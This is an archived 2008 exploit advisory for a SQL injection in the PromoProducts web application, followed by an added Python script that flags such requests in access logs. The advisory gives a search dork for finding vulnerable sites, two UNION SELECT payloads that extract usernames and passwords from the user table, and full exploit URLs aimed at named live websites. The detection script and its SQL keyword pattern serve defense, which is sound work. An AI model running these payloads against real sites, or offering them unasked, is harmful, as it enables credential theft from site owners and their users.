promoproducts-sql.txt

16 Aug 2008 00:00:00 | Reported by baltazar | Type: packetstorm | Source: packetstormsecurity.com

PromoProducts security vulnerability: SQL injection

`################################################################   
# .___ __ _______ .___ #   
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #   
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #   
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #   
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #   
# \/ \/ \/ #   
# ___________ ______ _ __ #   
# _/ ___\_ __ \_/ __ \ \/ \/ / #   
# \ \___| | \/\ ___/\ / #   
# \___ >__| \___ >\/\_/ #   
# est.2007 \/ \/ forum.darkc0de.com #   
################################################################   
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #   
# --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear --- #  
################################################################   
#   
# Author: baltazar and sinner_01   
#   
# Home : www.darkc0de.com & ljuska.org  
#   
# Email : [email protected], [email protected]  
#   
# Share the c0de!   
#   
################################################################   
#   
# App Name: PromoProducts  
#   
#   
# Dork: inurl:/view_product.php?cat_id= sub_cat  
#   
# POC:-9999+union+all+select+1,2,3,4,5,6,7,concat(user_name,char(58),password),9,10,11,12,13,14,115,16,17,18,19,20,21,22,23,24,25,26+from+user--  
#  
P0C-2:-9999+union+all+select+1,concat(user_name,char(58),password),null,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+user--  
#  
#Example:  
# http://www.number1promotions.com/view_product.php?cat_id=155&sub_cat=-9999+union+all+select+1,2,3,4,5,6,7,concat(user_name,char(58),password),9,10,11,12,13,14,115,16,17,18,19,20,21,22,23,24,25,26+from+user--  
#   
http://fastproductsupplies.com/view_product.php?cat_id=6500&sub_cat=6508&product_id=-9999+union+all+select+1,concat(user_name,char(58),password),null,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+user--  
#  
################################################################   
# Vuln Discovered 04/14/2008   
  
`
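A defender-side check for the request pattern in the advisory, as an added example that is not part of the original advisory or of the PromoProducts code: it flags access-log requests to view_product.php whose cat_id, sub_cat or product_id value is not a plain integer. The combined log format, the assumption that these IDs are always non-negative integers, and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory shows being passed to view_product.php.
ID_PARAMS = ("cat_id", "sub_cat", "product_id")
# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Keywords only refine the reason string; the decision is the integer check.
SQL_HINT_RE = re.compile(r"\b(union|select|concat|from)\b", re.I)

def check_line(line):
    """Return (param, decoded_value, reason) findings for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/view_product.php"):
        return []
    findings = []
    # parse_qsl decodes %xx and '+', so encoded payloads are checked in clear text.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in ID_PARAMS and not re.fullmatch(r"\d{1,10}", value):
            reason = "sql-keywords" if SQL_HINT_RE.search(value) else "non-integer"
            findings.append((name, value, reason))
    return findings

# Constructed sample log lines (IPs, timestamps and sizes are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Aug/2008:10:00:01 +0000] "GET /view_product.php?cat_id=155&sub_cat=160 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [16/Aug/2008:10:00:07 +0000] "GET /view_product.php?cat_id=155&sub_cat=-9999+union+all+select+1,2,3+from+user-- HTTP/1.1" 200 4821',
    '192.0.2.44 - - [16/Aug/2008:10:00:09 +0000] "GET /view_product.php?cat_id=6500&sub_cat=6508&product_id=-9999%20UNION%20ALL%20SELECT%201%2C2 HTTP/1.1" 200 4790',
    '192.0.2.10 - - [16/Aug/2008:10:00:12 +0000] "GET /view_product.php?cat_id=12abc HTTP/1.1" 200 300',
    '192.0.2.10 - - [16/Aug/2008:10:00:15 +0000] "GET /index.php?q=select+a+gift HTTP/1.1" 200 900',
]

def scan(lines):
    """Map line index -> findings for every line with at least one finding."""
    return {i: f for i, line in enumerate(lines) if (f := check_line(line))}

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_LOG).items():
        print(idx, found)
```

The same integer-only rule belongs in the application itself: cast or validate the ID parameters and bind them in a parameterized query, so the log check is a detection layer rather than the fix.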
